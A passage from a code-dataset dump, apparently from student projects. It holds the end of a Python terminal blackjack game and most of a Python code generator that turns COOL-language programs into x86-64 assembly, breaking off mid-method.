= 0\n dealerHand = []\n dealerNumAces = 0\n dealerTotal = 0\n print(\"dealing cards...\")\n \n\n # start of round\n for x in range(4):\n randomNumber = random.randint(0, len(deck) - 1)\n card = Card(deck[randomNumber])\n if x % 2 == 0:\n userHand.append(card)\n userTotal += card.getNumValue()\n if card.getValue() == \"A\":\n userNumAces += 1\n else:\n dealerHand.append(card)\n 
dealerTotal += card.getNumValue()\n                if card.getValue() == \"A\":\n                    dealerNumAces += 1\n            del deck[randomNumber]\n        \n        print(\"--------------------- DEALER'S HAND -----------------------\", end=\"\\n\\n\")\n        printDealerDeck(dealerHand)\n        print(\"\\n----------------------- YOUR HAND -------------------------\", end=\"\\n\\n\")\n        printDeck(userHand)\n\n        # stay or hit for user\n        while(userTotal < 21):\n            if (userTotal == 11 and userNumAces > 0):\n                userTotal += 10\n                break\n            hitOrStay = input(\"would you like to hit or stay? For hit type 'h', for stay type 's': \")\n            if (hitOrStay == 's'):\n                break\n            elif (hitOrStay == 'h'):\n                randomNumber = random.randint(0, len(deck) - 1)\n                card = Card(deck[randomNumber])\n                userHand.append(card)\n                del deck[randomNumber]\n                if card.getValue() == \"A\":\n                    userNumAces += 1\n                if (userTotal == 10):\n                    userTotal += 11\n                    break\n                userTotal += card.getNumValue()\n                printDeck(userHand)\n            else:\n                print(\"your input was incorrectly formatted, please try again...\")\n        \n        if (userTotal <= 10 and userNumAces > 0):\n            userTotal += 10\n            userNumAces -= 1\n        \n        if (userTotal == 21):\n            print(\"Congrats, you got 21 perfectly! You win\")\n            continue\n\n        elif (userTotal > 21):\n            print(\"You went bust! Would you like to play again?\")\n        \n        else:\n            print(\"\\n--------------------- DEALER'S HAND -----------------------\", end=\"\\n\\n\")\n            # stay or hit for dealer\n            while(dealerTotal < 17):\n                randomNumber = random.randint(0, len(deck) - 1)\n                card = Card(deck[randomNumber])\n                dealerHand.append(card)\n                del deck[randomNumber]\n                if card.getValue() == \"A\":\n                    dealerNumAces += 1\n                if (dealerTotal == 10 ):\n                    dealerTotal += 11\n                dealerTotal += card.getNumValue()\n                printDealerDeck(dealerHand)\n            if (dealerTotal <= 10 and dealerNumAces > 0):\n                dealerNumAces -= 1\n                dealerTotal += 10\n            if(dealerTotal == 21):\n                printDeck(dealerHand)\n                print(\"Dealer got 21 and wins\", end=\"\\n\\n\")\n            elif (dealerTotal > 21 and userTotal > 21):\n                printDeck(dealerHand)\n                print(\"you both lose!\")\n            elif (dealerTotal > 21 and userTotal <= 21):\n                printDeck(dealerHand)\n                print(\"You win!\")\n            elif (dealerTotal < userTotal):\n                printDeck(dealerHand)\n                print(\"You win!\")\n            elif (dealerTotal > userTotal):\n                printDeck(dealerHand)\n                print(\"Dealer wins\")\n            elif (dealerTotal == userTotal):\n                printDeck(dealerHand)\n                print(\"You tie\")\n\n    \n\n    \n    \n\n\nif __name__ == \"__main__\":\n    print(blackjackASCII)\n    # os.system(\"say Hello my name is Andrea!\")\n    playLogic()","sub_path":"blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":7852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"67259043","text":"from .cool_ast import *\nfrom .cool_global import *\nfrom collections import OrderedDict\nfrom operator import itemgetter\nfrom .utilities import *\n\n# %rax accumulator\n# %rdi self object address\n\nclass CGen(object):\n\n    def __init__(self, program: 'Program', type_scope: 'Scope'):\n        self.program = program\n        self.type_scope = type_scope\n\n        self.tag = -1\n        self.seq = -1\n        self.condSeq = -1\n\n        self.attrtable = {}\n        self.wordsize = 8\n\n        self.prototypes = OrderedDict()\n        self.dispatchTable = {}\n        self.methodList = []\n\n        self.param_regs = ['%rdi', '%rsi', '%rdx', '%rcx', '%r8', '%r9']\n        self.caller_save = ['%rdx', '%rcx', '%rsi', '%rdi', '%r8', '%r9', '%r10']\n        self.callee_save = ['%rbx', '%r12', '%r13', '%r14']\n\n\n        self.predefinedClassName = ['Object', 'IO', 'Int', 'String', 'Bool']\n        self.rt_defined_methods = ['IO_in_int']\n        \n        self.inttable = {}\n        
self.stringtable = {}\n self.str_contenttable = {}\n self.booltable = {}\n self.tagtable = {}\n\n self.initialize()\n self.scope = CGen_scope()\n\n def initialize(self):\n seq = self.genSeqNum()\n self.inttable['0'] = \"int_const\" + str(seq)\n \n self.stringtable[''] = {}\n self.stringtable['']['label'] = \"string_const\" + str(seq)\n self.stringtable['']['content'] = \"string_content\" + str(seq)\n self.str_contenttable[\"string_content\" + str(seq)] = \"\"\n\n\n def genTag(self):\n # generate prime number for class tag\n self.tag += 1\n return self.tag\n\n def genSeqNum(self):\n self.seq += 1\n return self.seq\n\n def genCondSeq(self):\n self.condSeq += 1\n return self.condSeq\n\n\n def genGloDirectives(self):\n\n ret = \"\\n\"\n ret += TAB + \".globl Main_init\" + NEWLINE\n ret += TAB + \".globl Main_protoObj\" + NEWLINE\n ret += TAB + \".globl String_protoObj\" + NEWLINE\n ret += TAB + \".globl Main_main\" + NEWLINE\n ret += NEWLINE\n\n return ret\n\n def getPredeinedClasses(self):\n ObjectClass = Class(\n 'Object',\n [\n FeatureMethodDecl('abort', [], 'Object', None),\n # FeatureMethodDecl('type_name', [], 'String', None),\n FeatureMethodDecl('copy', [], 'SELF_TYPE', None)\n ]\n )\n\n IOClass = Class(\n 'IO',\n [\n FeatureMethodDecl('out_string', [FormalParam('x', 'String')], 'SELF_TYPE', None),\n FeatureMethodDecl('out_int', [FormalParam('x', 'Int')], 'SELF_TYPE', None),\n FeatureMethodDecl('in_string', [], 'String', None),\n FeatureMethodDecl('in_int', [], 'Int', None)\n ],\n 'Object'\n )\n\n IntClass = Class('Int', [FeatureAttribute('value', 'Int', Integer(0))], 'Object')\n\n BoolClass = Class('Bool', [FeatureAttribute('value', 'Bool', Boolean(False))], 'Object')\n\n StringClass = Class(\n 'String',\n [\n FeatureMethodDecl('length', [], 'Int', None),\n FeatureMethodDecl('concat', [FormalParam('s', 'String')], 'String', None),\n FeatureMethodDecl('substr', [FormalParam('i', 'Int'), FormalParam('l', 'Int')], 'String', None),\n FeatureAttribute('size', 'Int', Integer(0)),\n FeatureAttribute('value', 'String', String(\"\"))\n ],\n 'Object'\n )\n\n return [ObjectClass, IOClass, StringClass, IntClass, BoolClass]\n\n def collectGlobalData(self):\n\n attr_start_index = 3\n\n # generate prototype objects\n all_classes = self.getPredeinedClasses() + self.program.classes\n\n for c in all_classes:\n self.attrtable[c.className] = {}\n prototype = []\n \n tag = self.genTag()\n self.tagtable[c.className] = tag\n prototype.append(tag) # tag\n\n attributes = [f for f in c.features if isinstance(f, FeatureAttribute)]\n prototype.append(len(attributes) + attr_start_index) # size\n\n dispatchTab_lab = c.className + UNDERSCORE + DISPATCH_TABLE\n prototype.append(dispatchTab_lab)\n\n\n methodDecls = [f for f in c.features if isinstance(f, FeatureMethodDecl)]\n self.dispatchTable[c.className] = [(c.className, m.methodName) for m in methodDecls] \n\n # initialize attribute all to 0 in the prototype object\n for i, attr in enumerate(attributes):\n prototype.append(0)\n\n self.attrtable[c.className][attr.id] = {}\n self.attrtable[c.className][attr.id]['offset'] = (i + attr_start_index) * self.wordsize\n self.attrtable[c.className][attr.id]['type'] = attr.decType\n \n self.prototypes[c.className] = prototype\n\n for c in all_classes:\n if c.inheritType:\n parentProtObj = self.prototypes[c.inheritType]\n parentAttrs = parentProtObj[attr_start_index :]\n parentMethods = self.dispatchTable[c.inheritType]\n\n protoObj = self.prototypes[c.className]\n protoObjAttrs = protoObj[attr_start_index:]\n 
self.prototypes[c.className] = protoObj[0:attr_start_index] + parentAttrs + protoObjAttrs\n protoMethods = self.dispatchTable[c.className]\n self.dispatchTable[c.className] = parentMethods + protoMethods\n\n def code_genProtoTable(self):\n ret = \"\"\n\n # generate prototype object\n for className, values in self.prototypes.items():\n value_str = NEWLINE.join([TAB + WORD + TAB + str(v) for v in values])\n ret += NEWLINE + className + UNDERSCORE + PROTOTYPE_SUFFIX + COLON + NEWLINE + value_str + NEWLINE\n\n return ret\n\n def translate_dispatchTable(self):\n # transfer dispatch table so that for each class, its methods map to an associated offset in the list\n for className, methodList in self.dispatchTable.items():\n newvalue = {}\n for index, method in enumerate(methodList):\n definedClassName = method[0]\n methodName = method[1]\n\n if methodName in newvalue:\n newvalue[methodName]['definedClassName'] = definedClassName\n else:\n newvalue[methodName] = {}\n newvalue[methodName]['offset'] = index * self.wordsize\n newvalue[methodName]['definedClassName'] = definedClassName\n\n self.dispatchTable[className] = newvalue\n\n def code_genDispatchTable(self):\n # generate dispatch table\n ret = \"\"\n self.translate_dispatchTable()\n for className, methodInfos in self.dispatchTable.items():\n\n sorted_methodInfos = sorted(methodInfos.items(), key=lambda value: value[1]['offset'])\n\n disp_value = []\n for (methodName, methodInfo) in sorted_methodInfos:\n disp_method_name = str(methodInfo['definedClassName']) + UNDERSCORE + str(methodName)\n if disp_method_name in self.rt_defined_methods:\n disp_method_name = UNDERSCORE + disp_method_name\n\n \n disp_value.append(TAB + WORD + TAB + disp_method_name)\n self.methodList.append(disp_method_name)\n\n value_str = NEWLINE.join(disp_value)\n ret += NEWLINE + className + UNDERSCORE + DISPATCH_TABLE + COLON + NEWLINE + value_str + NEWLINE\n\n return ret\n\n def code_genClassObjTable(self):\n # generate classObj table \n ret = \"\" \n\n all_classnames = [c for c in self.prototypes.keys()]\n classObjs = []\n for className in all_classnames:\n protoLabel = className + UNDERSCORE + PROTOTYPE_SUFFIX\n initLabel = className + UNDERSCORE + INIT\n classObjs.append(protoLabel)\n classObjs.append(initLabel)\n classObjs_str = NEWLINE.join([TAB + WORD + TAB + str(name) for name in classObjs])\n\n ret += NEWLINE + OBJTABLE + COLON + NEWLINE + classObjs_str + NEWLINE\n\n return ret\n\n def code_genIntConsts(self):\n int_consts = []\n\n int_tag = str(self.tagtable['Int'])\n size = '4'\n dispathTable = \"Int_dispatch_table\"\n\n for int_str, label in self.inttable.items():\n\n\n const = [\n TAB + WORD + TAB + int_tag + NEWLINE,\n TAB + WORD + TAB + size + NEWLINE,\n TAB + WORD + TAB + dispathTable + NEWLINE,\n TAB + WORD + TAB + int_str + NEWLINE \n ]\n\n int_consts.append(label + COLON + NEWLINE + \"\".join(const))\n\n return NEWLINE.join(int_consts)\n\n def codeg_genStringConsts(self):\n\n string_consts = []\n string_tag = str(self.tagtable['String'])\n size = '6'\n dispathTable = \"String_dispatch_table\"\n\n for string, info in self.stringtable.items():\n len_const = self.inttable[str(len(string))]\n label = info['label']\n content_label = info['content']\n\n string = '\\\"\\\"' if string == '' else string\n\n const = [\n TAB + WORD + TAB + string_tag + NEWLINE,\n TAB + WORD + TAB + size + NEWLINE,\n TAB + WORD + TAB + dispathTable + NEWLINE,\n TAB + WORD + TAB + len_const + NEWLINE,\n TAB + WORD + TAB + content_label + NEWLINE,\n TAB + ALIGN + TAB + 
str(self.wordsize) + NEWLINE\n            ]\n\n            string_consts.append(label + COLON + NEWLINE + \"\".join(const))\n\n        return NEWLINE.join(string_consts)\n\n\n    def code_genInitValue(self, ty):\n\n        ret = \"\"\n\n        if ty == \"Int\":\n            zero_label = self.inttable['0']\n            ret += TAB + \"leaq {}(%rip), %rax\".format(zero_label) + NEWLINE\n            # ret += TAB + \"movq {}(%rax), %rax\".format(INTCONST_VALOFFSET) + NEWLINE\n            # ret += TAB + \"movq (%rax), %rax\" + NEWLINE\n        elif ty == \"String\":\n            empty_label = self.stringtable['']['label']\n            ret += TAB + \"leaq {}(%rip), %rax\".format(empty_label) + NEWLINE\n            # ret += TAB + \"movq {}(%rax), %rax\".format(STRCONST_STROFFSET) + NEWLINE\n        elif ty == \"Bool\":\n            ret += TAB + \"movq $0, %rax\" + NEWLINE\n        \n\n        return ret\n\n\n    def code_genConstantContent(self):\n\n        ret = \"\" + NEWLINE + NEWLINE\n\n        for content_label, value in self.str_contenttable.items():\n            value = \"\\\"\\\"\" if value == \"\" else value\n            ret += content_label + COLON + NEWLINE + \\\n                TAB + ASCIZ + TAB + value + NEWLINE + \\\n                TAB + ALIGN + TAB + \"8\" + NEWLINE\n\n        # for content_label, value in self.int_contenttable.items():\n        #     ret += content_label + COLON + TAB + WORD + TAB + value + NEWLINE \n\n        return ret + NEWLINE\n    \n    \n\n\n\n#######################################################################################################################\n\n    def code_gen(self):\n        data_header = \".data\" + NEWLINE\n\n        self.collectGlobalData()\n        data = self.code_genClassObjTable()\n        data += self.code_genProtoTable()\n        data += self.code_genDispatchTable()\n\n        globl_directives = self.genGloDirectives()\n\n        text_header = \".text\" + NEWLINE\n        text = self.code_genProgram()\n\n        const_content = self.code_genConstantContent() + NEWLINE\n\n        data += self.code_genIntConsts() + NEWLINE\n        data += self.codeg_genStringConsts() + NEWLINE\n\n        return data_header + globl_directives + const_content + data + NEWLINE + text_header + text + NEWLINE\n\n\n    def code_genProgram(self):\n\n        ret = \"\"\n        for c in self.getPredeinedClasses() + self.program.classes:\n            ret += NEWLINE + self.code_genClass(c)\n\n        return ret\n\n\n    def code_genClass(self, c):\n\n        ret = \"\"\n        self.scope.enterScope()\n\n        hasSeenInit = False\n        hasAttrbutes = True if self.attrtable[c.className] else False\n\n        for feature in c.features:\n            if not isinstance(feature, FeatureMethodDecl):\n                continue\n            \n            if feature.methodName == \"init\":\n                hasSeenInit = True\n                if hasAttrbutes:\n                    feature = self.addAttrInitToFeature(c, feature)\n\n            ret += NEWLINE + self.code_genMethod(c, feature)\n\n        if not hasSeenInit and not hasAttrbutes:\n            ret += self.gen_emptyInit(c)\n        elif not hasSeenInit:\n            defaultMethod = self.generateDefaulInit(c)\n            ret += self.code_genMethod(c, defaultMethod)\n        elif not hasAttrbutes:\n            pass\n        \n        \n        return ret\n\n    def addAttrInitToFeature(self, c, method):\n        attrs = self.getAttributesFromClass(c)\n\n        new_body = Block([])\n\n        for id, initInfo in attrs.items():\n            ty = initInfo[0]\n            init = initInfo[1]\n\n            if ty == 'String':\n                rvalue = init if init else String(\"\")\n            elif ty == \"Int\":\n                rvalue = init if init else Integer(0)\n            elif ty == \"Bool\":\n                rvalue = init if init else Boolean(False)\n            else:\n                rvalue = init if init else Integer(-1)\n\n            new_body.exprs.append(AssignmentExpr(id, rvalue))\n\n        new_body.exprs.append(method.bodyExpr)\n        method.bodyExpr = new_body\n\n        return method\n\n    def generateDefaulInit(self, c: 'class'):\n        attrs = self.getAttributesFromClass(c)\n        body = Block([])\n\n        for id, initInfo in attrs.items():\n            ty = initInfo[0]\n            init = initInfo[1]\n\n            if 
ty == 'String':\n rvalue = init if init else String(\"\")\n elif ty == \"Int\":\n rvalue = init if init else Integer(0)\n elif ty == \"Bool\":\n rvalue = init if init else Boolean(False)\n else:\n rvalue = init if init else Integer(-1)\n\n body.exprs.append(AssignmentExpr(id, rvalue))\n\n return FeatureMethodDecl('init', [], 'Object', body)\n\n\n def gen_emptyInit(self, c: 'Class'):\n ret = self.genMethodEntry()\n\n if c.inheritType:\n ret += self.genFuncCall(c.inheritType + UNDERSCORE + INIT)\n\n ret += self.genMethodExit()\n\n return c.className + UNDERSCORE + INIT + COLON + NEWLINE + ret + NEWLINE\n\n def getAttributesFromClass(self, c):\n return dict([(f.id, (f.decType, f.init)) for f in c.features if isinstance(f, FeatureAttribute)])\n\n def code_genMethod(self, c: 'Class', method):\n if c.className in self.predefinedClassName and method.methodName != 'init':\n return \"\"\n\n # params_offset = {}\n self.scope.enterScope()\n ret = \"\"\n \n if method.methodName == c.className:\n label = c.className + UNDERSCORE + INIT\n else:\n label = c.className + UNDERSCORE + method.methodName\n\n ret += self.genMethodEntry()\n\n if method.methodName == \"init\" and c.inheritType:\n ret += self.genFuncCall(\"{}_init\".format(c.inheritType))\n\n num_params = len(method.formalParams) + 1\n\n # this will be used to calculate the offset of local from base pointer\n num_locals = num_params\n\n stack_size = align(num_params * self.wordsize, ALIGNMENT_SIZE)\n\n ret += TAB + \"subq ${}, %rsp\".format(stack_size) + NEWLINE\n\n if num_params > 0:\n for i in range(num_params):\n if i < 6:\n source_reg = self.param_regs[i]\n target_offset = -(i + 5) * self.wordsize\n ret += TAB + \"movq {}, {}(%rbp)\".format(source_reg, target_offset) + NEWLINE\n else:\n target_offset = -(i + 5) * self.wordsize\n ret += TAB + \"movq {}(%rbp), %rax\".format(i + self.wordsize) + NEWLINE\n ret += TAB + \"movq %rax, {}(%rbp)\".format(target_offset) + NEWLINE\n\n # offset always starts 32 bytes from the base pointer \n # since those 32 bytes are used for storing callee save regs content\n if i == 0 : # self\n self.scope.addId('self', -(i + 5) * self.wordsize, c.className)\n else:\n id = method.formalParams[i - 1].id\n ty = method.formalParams[i - 1].decType\n self.scope.addId(id, -(i + 5) * self.wordsize, ty)\n\n body_code, _ = self.code_genExpr(c, method, num_locals, method.bodyExpr)\n \n ret += body_code\n\n # restore stack\n ret += TAB + \"addq ${}, %rsp\".format(stack_size) + NEWLINE\n\n ret += self.genMethodExit()\n self.scope.existScope()\n\n return label + COLON + NEWLINE + ret + NEWLINE\n\n def code_genExpr(self, c, method, num_locals, expr, isLvalue=False):\n if isinstance(expr, AssignmentExpr):\n return self.code_genAssignment(c, method, num_locals, expr, isLvalue)\n elif isinstance(expr, Dispatch):\n return self.code_genDispatch(c, method, num_locals, expr, isLvalue)\n elif isinstance(expr, String):\n return self.code_genString(c, method, num_locals, expr, isLvalue)\n elif isinstance(expr, Integer):\n return self.code_genInteger(c, method, num_locals, expr, isLvalue)\n elif isinstance(expr, If):\n return self.code_genIf(c, method, num_locals, expr, isLvalue)\n elif isinstance(expr, Boolean):\n return self.code_genBoolean(c, method, num_locals, expr, isLvalue)\n elif isinstance(expr, While):\n return self.code_genWhile(c, method, num_locals, expr, isLvalue)\n elif isinstance(expr, BinaryOp):\n return self.code_genBinary(c, method, num_locals, expr, isLvalue)\n elif isinstance(expr, Not):\n return self.code_genNot(c, 
method, num_locals, expr, isLvalue)\n elif isinstance(expr, Self):\n return self.code_genSelf(c, method, num_locals, expr, isLvalue)\n elif isinstance(expr, Id):\n return self.code_genId(c, method, num_locals, expr, isLvalue)\n elif isinstance(expr, Block):\n return self.code_genBlock(c, method, num_locals, expr, isLvalue)\n elif isinstance(expr, Let):\n return self.code_genLet(c, method, num_locals, expr, isLvalue)\n elif isinstance(expr, ParenExpr):\n return self.code_genExpr(c, method, num_locals, expr.e, isLvalue)\n elif isinstance(expr, NewConstruct):\n return self.code_genNew(c, method, num_locals, expr, isLvalue)\n elif isinstance(expr, Neg):\n return self.code_genNeg(c, method, num_locals, expr, isLvalue)\n\n def code_genNeg(self, c, method, num_locals, expr, isLvalue):\n expr_code, expr_type = self.code_genExpr(c, method, num_locals, expr.expr, isLvalue)\n\n return expr_code + TAB + \"negq %rax\" + NEWLINE, expr_type\n\n def code_genNew(self, c, method, num_locals, newExpr, isLvalue):\n object_name = newExpr.objType\n\n ret = TAB + \"leaq {}_protoObj(%rip), %rdi\".format(object_name) + NEWLINE\n ret += self.genFuncCall(\"Object_copy\") + NEWLINE\n ret += TAB + \"movq %rax, %rdi\" + NEWLINE\n ret += TAB + \"pushq %rax\" + NEWLINE\n ret += TAB + \"subq $8, %rsp\" + NEWLINE\n ret += self.genFuncCall(\"{}_init\".format(object_name)) + NEWLINE\n ret += TAB + \"addq $8, %rsp\" + NEWLINE\n ret += TAB + \"popq %rax\" + NEWLINE\n\n return ret, object_name\n\n def code_genLet(self, c, method, num_locals, letExpr, isLvalue):\n\n self.scope.enterScope()\n decl_num = len(letExpr.declareVars)\n\n # save space on the stack for let varaibles\n stack_size = align(decl_num * self.wordsize, ALIGNMENT_SIZE)\n ret = TAB + \"subq ${}, %rsp\".format(stack_size) + NEWLINE\n\n for i, varDecl in enumerate(letExpr.declareVars):\n id = varDecl.id\n offset = -(i + num_locals + 5) * self.wordsize\n self.scope.addId(id, offset, varDecl.decType)\n\n if varDecl.init:\n init, _ = self.code_genExpr(c, method, num_locals + decl_num, varDecl.init, True)\n else:\n init = self.code_genInitValue(varDecl.decType)\n \n ret += init\n ret += TAB + \"movq %rax, {}(%rbp)\".format(offset) + NEWLINE\n\n body, body_type = self.code_genExpr(c, method, num_locals + decl_num, letExpr.bodyExpr, isLvalue)\n\n ret += body\n self.scope.existScope()\n\n return ret, body_type \n\n def code_genBlock(self, c, method, num_locals, block, isLvalue):\n\n codes = []\n for i in range(len(block.exprs) - 1):\n ret, _ = self.code_genExpr(c, method, num_locals, block.exprs[i], isLvalue)\n codes.append(ret)\n \n last_code, ty = self.code_genExpr(c, method, num_locals, block.exprs[-1], isLvalue)\n codes.append(last_code)\n\n return NEWLINE.join(codes), ty\n\n def code_genSelf(self, c, method, num_locals, selfExpr, isLvalue):\n return TAB + \"movq {}(%rbp), %rax\".format(STACK_SELF_OFFST) + NEWLINE, 'Self'\n \n def code_genId(self, c, method, num_locals, idExpr, isLvalue):\n\n ret = \"\"\n ty = None\n\n offset = self.scope.lookup_offset(idExpr.id)\n if offset:\n ty = self.scope.lookup_type(idExpr.id)\n ret += TAB + \"movq {}(%rbp), %rax\".format(offset) + NEWLINE\n\n # id is an instance variable\n if idExpr.id in self.attrtable[c.className]:\n object_addr_offset = self.scope.lookup_offset('self')\n object_attr_offset = self.attrtable[c.className][idExpr.id]['offset']\n object_attr_type = self.attrtable[c.className][idExpr.id]['type']\n ty = object_attr_type\n\n ret = TAB + \"movq {}(%rbp), %rax\".format(object_addr_offset) + NEWLINE\n ret += TAB + 
\"movq {}(%rax), %rax\".format(object_attr_offset) + NEWLINE\n\n if self.scope.lookup_type(idExpr.id) == 'Int' or self.attrtable[c.className][idExpr.id]['type'] == 'Int':\n if not isLvalue:\n ret += TAB + \"movq {}(%rax), %rax\".format(INTCONST_VALOFFSET) + NEWLINE\n\n return ret, ty\n\n exit(\"{} not in params_offset\").format(idExpr.id)\n\n def code_genNot(self, c, method, num_locals, expr, isLvalue):\n if isinstance(expr, GreaterThan):\n return code_genExpr(self, c, method, num_locals, LessEq(expr.e1, expr.e2), isLvalue)\n elif isinstance(expr, GreaterEq):\n return code_genExpr(self, c, method, num_locals, LessThan(expr.e1, expr.e2), isLvalue)\n elif isinstance(expr, Eq):\n return code_genExpr(self, c, method, num_locals, NotEq(expr.e1, expr.e2), isLvalue)\n elif isinstance(expr, NotEq):\n return code_genExpr(self, c, method, num_locals, Eq(expr.e1, expr.e2), isLvalue)\n elif isinstance(expr, LessThan):\n return code_genExpr(self, c, method, num_locals, GreaterEq(expr.e1, expr.e2), isLvalue)\n elif isinstance(expr, LessEq):\n return code_genExpr(self, c, method, num_locals, GreaterThan(expr.e1, expr.e2), isLvalue)\n else:\n exit(\"this should not happend - code genNode\")\n \n def code_genBinaryArith(self, c, method, num_locals, expr, isLvalue):\n if isinstance(expr, Plus):\n op = \"addq\"\n elif isinstance(expr, Minus):\n op = \"subq\"\n elif isinstance(expr, Multiply):\n op = \"imulq\"\n elif isinstance(expr, Divide):\n op = \"idivq\"\n\n e1, ty1 = self.code_genExpr(c, method, num_locals, expr.e1, False)\n e2, ty2 = self.code_genExpr(c, method, num_locals, expr.e2, False)\n\n\n\n ret = e1 + NEWLINE\n ret += TAB + \"push %rax\" + NEWLINE\n ret += e2 + NEWLINE\n ret += TAB + \"movq %rax, %rdi\" + NEWLINE #e2 : rdi\n ret += TAB + \"popq %rax\" + NEWLINE #e1 : rax\n if op == \"idivq\":\n ret += TAB + \"xorq %rdx, %rdx\" + NEWLINE\n ret += TAB + \"idivq %rdi\" + NEWLINE\n else:\n ret += TAB + \"{} %rdi, %rax\".format(op) + NEWLINE\n\n ret += TAB + \"movq %rax, %rdi\" + NEWLINE\n ret += TAB + \"pushq %rdi\" + NEWLINE\n ret += TAB + \"subq $8, %rsp\" + NEWLINE\n\n newcode, _ = self.code_genNew(c, method, num_locals, NewConstruct(\"Int\"), isLvalue)\n ret += newcode + NEWLINE\n ret += TAB + \"addq $8, %rsp\" + NEWLINE\n ret += TAB + \"popq %rdi\" + NEWLINE\n ret += TAB + \"movq %rdi, {}(%rax)\".format(INTCONST_VALOFFSET) + NEWLINE\n\n return ret, 'Int'\n\n def code_genBinary(self, c, method, num_locals, expr, isLvalue):\n\n if isinstance(expr, (Plus, Minus, Multiply, Divide)):\n return self.code_genBinaryArith(c, method, num_locals, expr, isLvalue)\n \n # condition\n if isinstance(expr, GreaterThan):\n e = \"g\"\n elif isinstance(expr, GreaterEq):\n e = \"ge\"\n elif isinstance(expr, Eq):\n e = \"e\"\n elif isinstance(expr, LessThan):\n e = \"l\"\n elif isinstance(expr, LessEq):\n e = \"le\"\n elif isinstance(expr, NotEq):\n e = \"ne\"\n\n e1, _ = self.code_genExpr(c, method, num_locals, expr.e1, False)\n e2, _ = self.code_genExpr(c, method, num_locals, expr.e2, False)\n\n \n\n ret = e1\n ret += TAB + \"pushq %rax\" + NEWLINE\n ret += e2\n ret += TAB + \"popq %rdi\" + NEWLINE\n ret += TAB + \"cmpq %rax, %rdi\" + NEWLINE\n ret += TAB + \"set{} %al\".format(e) + NEWLINE\n ret += TAB + \"movzbq %al, %rax\" + NEWLINE\n\n return ret, 'Bool'\n\n def code_genWhile(self, c, method, num_locals, whileExpr, isLvalue):\n\n seqNum = self.genSeqNum()\n\n begin_label = c.className + \".\" + method.methodName + \".loop_start.\" + str(seqNum)\n end_label = c.className + \".\" + method.methodName + 
\".loop_end.\" + str(seqNum)\n\n cnd, _ = self.code_genExpr(c, method, num_locals, whileExpr.condition, False)\n body, _ = self.code_genExpr(c, method, num_locals, whileExpr.bodyExpr, isLvalue)\n\n ret = begin_label + COLON + NEWLINE\n ret += cnd + NEWLINE\n ret += TAB + \"cmpq $1, %rax\" + NEWLINE\n ret += TAB + \"jne {}\".format(end_label) + NEWLINE\n ret += body + NEWLINE\n ret += TAB + \"jmp {}\".format(begin_label) + NEWLINE\n\n ret += end_label + COLON + NEWLINE\n\n return ret, 'Object'\n \n \n def code_genIf(self, c, method, num_locals, ifExpr, isLvalue):\n\n seqNum = self.genCondSeq()\n els_label = c.className + \".\" + method.methodName + \".else.\" + str(seqNum)\n end_label = c.className + \".\" + method.methodName + \".end.\" + str(seqNum)\n\n cnd, _ = self.code_genExpr(c, method, num_locals, ifExpr.cnd, isLvalue)\n thn, _ = self.code_genExpr(c, method, num_locals, ifExpr.thn, True)\n els, _ = self.code_genExpr(c, method, num_locals, ifExpr.els, True)\n\n ret = TAB + \"cmpq $1, %rax\" + NEWLINE\n ret += TAB + \"jne {}\".format(els_label) + NEWLINE\n ret += thn + NEWLINE\n ret += TAB + \"jmp {}\".format(end_label) + NEWLINE\n ret += NEWLINE\n ret += els_label + COLON + NEWLINE\n ret += els + NEWLINE\n ret += end_label + COLON + NEWLINE\n\n return cnd + ret, _\n\n def code_genBoolean(self, c, method, num_locals, booleanExpr, isLvalue):\n if booleanExpr.bval:\n return TAB + \"movq $1, %rax\" + NEWLINE, 'Bool'\n \n return TAB + \"movq $0, %rax\" + NEWLINE, 'Bool'\n\n def code_genString(self, c, method, num_locals, stringExpr, isLvalue):\n\n if stringExpr.sval in self.stringtable:\n string_lab = self.stringtable[stringExpr.sval]['label']\n else:\n seq = self.genSeqNum()\n string_lab = \"string_const\" + str(seq)\n string_content_lab = \"string_content\" + str(seq)\n self.stringtable[stringExpr.sval] = {}\n self.stringtable[stringExpr.sval]['content'] = string_content_lab\n self.stringtable[stringExpr.sval]['label'] = string_lab\n self.str_contenttable[string_content_lab] = stringExpr.sval\n\n if not str(len(stringExpr.sval)) in self.inttable:\n int_lab = \"int_const\" + str(seq)\n self.inttable[str(len(stringExpr.sval))] = int_lab\n\n\n\n \n ret = TAB + \"leaq {}(%rip), %rax\".format(string_lab) + NEWLINE\n\n if isLvalue:\n return ret, 'String'\n\n # # the actual string is located at offset 32, the fifth field\n ret += TAB + \"movq {}(%rax), %rax\".format(STRCONST_STROFFSET) + NEWLINE\n\n return ret, 'String'\n\n def code_genInteger(self, c, method, num_locals, intExpr, isLvalue):\n if str(intExpr.ival) in self.inttable:\n int_label = self.inttable[str(intExpr.ival)]\n else:\n seq = self.genSeqNum()\n int_label = \"int_const\" + str(seq)\n self.inttable[str(intExpr.ival)] = int_label\n\n # get constant object address, then get content at offset\n ret = TAB + \"leaq {}(%rip), %rax\".format(int_label) + NEWLINE\n\n if isLvalue:\n return ret, 'Int'\n\n ret += TAB + \"movq {}(%rax), %rax\".format(INTCONST_VALOFFSET) + NEWLINE\n\n return ret, 'Int'\n\n def code_genDispatch(self, c: 'Class', method, num_locals, dispatchExpr, isLvalue):\n ret = \"\"\n\n obj_code, obj_ty = self.code_genExpr(c, method, num_locals, dispatchExpr.objExpr, True)\n ret += obj_code\n ret += TAB + \"push %rdi\" + NEWLINE\n ret += TAB + \"subq $8, %rsp\" + NEWLINE\n ret += TAB + \"movq %rax, %rdi\" + NEWLINE\n\n methodName = dispatchExpr.methodName\n arg_len = len(dispatchExpr.arguments)\n\n # rdi might be used in code_gen for arguments, so we need to push it again\n ret += TAB + \"push %rdi\" + NEWLINE\n ret += TAB 
